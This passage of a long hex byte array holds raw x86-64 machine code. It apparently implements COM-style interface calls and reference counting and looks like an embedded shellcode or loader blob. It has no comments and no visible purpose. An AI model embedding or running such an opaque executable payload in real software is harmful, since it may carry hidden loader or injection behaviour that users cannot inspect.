1609 0x8b, 0x95, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x18, 0x04, 0x00,
1610 0x00, 0x48, 0x81, 0xc1, 0x28, 0x05, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
1611 0x28, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff, 0xff, 0xff,
1612 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00,
1613 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x89,
1614 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x70, 0x03, 0x00, 0x00,
1615 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0x79,
1616 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xe0, 0x02, 0x00, 0x00, 0x48, 0x89,
1617 0x85, 0x80, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x70, 0x03, 0x00, 0x00,
1618 0x48, 0x83, 0xc0, 0x10, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04,
1619 0x00, 0x00, 0xe8, 0x8c, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xf0, 0x01,
1620 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85,
1621 0x70, 0x03, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x28, 0x48, 0x89, 0xc2, 0x48,
1622 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0x10, 0x09, 0x00, 0x00, 0x48,
1623 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x01, 0x00,
1624 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff,
1625 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00,
1626 0x00, 0x00, 0x0f, 0x85, 0x89, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
1627 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b,
1628 0x95, 0x10, 0x04, 0x00, 0x00, 0x4c, 0x8d, 0x82, 0xa4, 0x08, 0x00, 0x00,
1629 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x84, 0x08,
1630 0x00, 0x00, 0x48, 0x8d, 0x95, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54,
1631 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba,
1632 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00,
1633 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x30, 0x02, 0x00,
1634 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c,
1635 0x8b, 0x08, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x90,
1636 0xe4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48,
1637 0x8d, 0x8d, 0xe0, 0x03, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1,
1638 0x41, 0xff, 0xd1, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0,
1639 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0xb7, 0x01, 0x00, 0x00, 0x48, 0x8b,
1640 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x18,
1641 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1642 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00,
1643 0x00, 0x0f, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1644 0x00, 0x00, 0x48, 0x89, 0x85, 0xb0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85,
1645 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x18, 0x48,
1646 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0x03, 0x00,
1647 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00,
1648 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x2d, 0x01,
1649 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x05, 0xe5,
1650 0x05, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0, 0x48, 0x89,
1651 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0xf0, 0xbd, 0xff,
1652 0xff, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08,
1653 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1654 0x48, 0x89, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1655 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x48, 0x40, 0x48, 0x8b, 0x85,
1656 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x03, 0x00, 0x00, 0x41,
1657 0xb8, 0x02, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x89,
1658 0x85, 0xf0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00,
1659 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x03,
1660 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x83, 0xbd, 0xf0, 0x03, 0x00,
1661 0x00, 0x00, 0x0f, 0x85, 0x97, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
1662 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x28, 0x48, 0x8b,
1663 0x95, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00,
1664 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
1665 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00,
1666 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7,
1667 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20,
1668 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
1669 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85,
1670 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x75,
1671 0x26, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c,
1672 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0xba, 0x02,
1673 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xf0,
1674 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x8b,
1675 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00,
1676 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00,
1677 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x38, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1678 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1679 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x85,
1680 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85,
1681 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x48,
1682 0x83, 0xc0, 0x01, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x01, 0x00,
1683 0x00, 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1684 0xe8, 0xb3, 0x15, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00,
1685 0x00, 0x48, 0x8d, 0x4d, 0xd8, 0x48, 0x8d, 0x85, 0xe8, 0x01, 0x00, 0x00,
1686 0x48, 0x8b, 0x95, 0xf8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20,
1687 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2,
1688 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x03, 0x1e, 0x00, 0x00,
1689 0x89, 0x85, 0xf4, 0x03, 0x00, 0x00, 0x90, 0x48, 0x81, 0xc4, 0x80, 0x04,
1690 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10,
1691 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1692 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
1693 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x45,
1694 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xb7, 0x01, 0x00, 0x00, 0x48,
1695 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1696 0x15, 0xdf, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b, 0x45,
1697 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4f, 0x03, 0x00, 0x00, 0x48,
1698 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1699 0x15, 0xfc, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, 0x45,
1700 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x62, 0x03, 0x00, 0x00, 0x48,
1701 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1702 0x15, 0x63, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45,
1703 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x68, 0x03, 0x00, 0x00, 0x48,
1704 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1705 0x15, 0x62, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, 0x45,
1706 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x03, 0x00, 0x00, 0x48,
1707 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1708 0x15, 0x53, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b, 0x45,
1709 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8,
1710 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x58, 0x90, 0x48, 0x83, 0xc4,
1711 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48,
1712 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48,
1713 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20, 0x00,
1714 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0xc0, 0x00, 0x00, 0x00,
1715 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8d, 0x88, 0x04,
1716 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00,
1717 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xbb, 0x14, 0x00, 0x00, 0x85, 0xc0, 0x74,
1718 0x25, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8d, 0x88,
1719 0xb4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00,
1720 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x96, 0x14, 0x00, 0x00, 0x85, 0xc0,
1721 0x75, 0x1b, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89,
1722 0x10, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x68, 0x00, 0x00, 0x00, 0xb8, 0x00,
1723 0x00, 0x00, 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
1724 0x58, 0x48, 0x8d, 0x88, 0xc4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
1725 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x56, 0x14,
1726 0x00, 0x00, 0x85, 0xc0, 0x75, 0x26, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8d,
1727 0x50, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x45,
1728 0xf8, 0x48, 0x83, 0xc0, 0x10, 0x48, 0x89, 0xc1, 0xe8, 0x86, 0x03, 0x00,
1729 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20,
1730 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80,
1731 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1732 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89,
1733 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89,
1734 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0,
1735 0x0f, 0xc1, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83,
1736 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1737 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1738 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8,
1739 0x48, 0x8b, 0x55, 0xe8, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
1740 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4,
1741 0x8b, 0x45, 0xf4, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1742 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1743 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45,
1744 0x10, 0x48, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85,
1745 0xc0, 0x74, 0x39, 0x48, 0x83, 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03,
1746 0x40, 0x00, 0x80, 0xeb, 0x70, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
1747 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8,
1748 0x48, 0x8b, 0x40, 0x38, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x45,
1749 0xf8, 0x48, 0x8b, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10,
1750 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83,
1751 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d,
1752 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x40, 0x08,
1753 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x83, 0xc2, 0x28, 0x48, 0x89, 0xd1, 0xff,
1754 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8d, 0x50, 0x28, 0x48, 0x8b, 0x45,
1755 0x28, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4,
1756 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48,
1757 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00,
1758 0x00, 0x00, 0xc7, 0x45, 0xa8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4,
1759 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00,
1760 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x19,
1761 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
1762 0x40, 0x18, 0x48, 0x8d, 0x55, 0xb0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89,
1763 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc, 0x00, 0x75,
1764 0x2a, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x20,
1765 0x4c, 0x8d, 0x45, 0xa4, 0x48, 0x8d, 0x4d, 0xa8, 0x48, 0x8d, 0x55, 0xac,
1766 0x48, 0x8b, 0x45, 0x18, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
1767 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0xb8, 0x00, 0x00, 0x00, 0x00,
1768 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1769 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b,
1770 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b,
1771 0x40, 0x58, 0x48, 0x8b, 0x40, 0x68, 0xff, 0xd0, 0x48, 0x8b, 0x55, 0x18,
1772 0x89, 0x02, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1773 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1774 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1775 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
1776 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1777 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1778 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00,
1779 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1780 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1781 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48,
1782 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x65, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10,
1783 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf1, 0x00,
1784 0x00, 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
1785 0x00, 0x48, 0x8d, 0x15, 0x11, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10,
1786 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x38, 0x01,
1787 0x00, 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
1788 0x00, 0x48, 0x8d, 0x15, 0x39, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20,
1789 0x48, 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48,
1790 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x10, 0x90,
1791 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1792 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
1793 0x7d, 0x20, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75,
1794 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8d, 0x88, 0x04,
1795 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00,
1796 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x07, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x74,
1797 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8d, 0x88,
1798 0xc4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00,
1799 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xe2, 0x10, 0x00, 0x00, 0x85, 0xc0,
1800 0x75, 0x1b, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89,
1801 0x10, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00,
1802 0x00, 0x00, 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00,
1803 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4,
1804 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48,
1805 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x08, 0x48,
1806 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00,
1807 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08, 0x48,
1808 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
1809 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0,
1810 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00,
1811 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02,
1812 0x01, 0xc8, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10,
1813 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
1814 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1815 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1816 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x48,
1817 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xc0, 0x01,
1818 0x00, 0x00, 0x48, 0x89, 0x95, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1819 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x57, 0x03,
1820 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1821 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xff, 0x03, 0x00, 0x00, 0x48, 0x89,
1822 0x50, 0x08, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1823 0x48, 0x8d, 0x15, 0x1c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
1824 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1825 0x40, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x85, 0xc8,
1826 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x04, 0x00,
1827 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1828 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89,
1829 0x50, 0x28, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1830 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
1831 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1832 0x3b, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x85, 0xc8,
1833 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x39, 0x05, 0x00,
1834 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
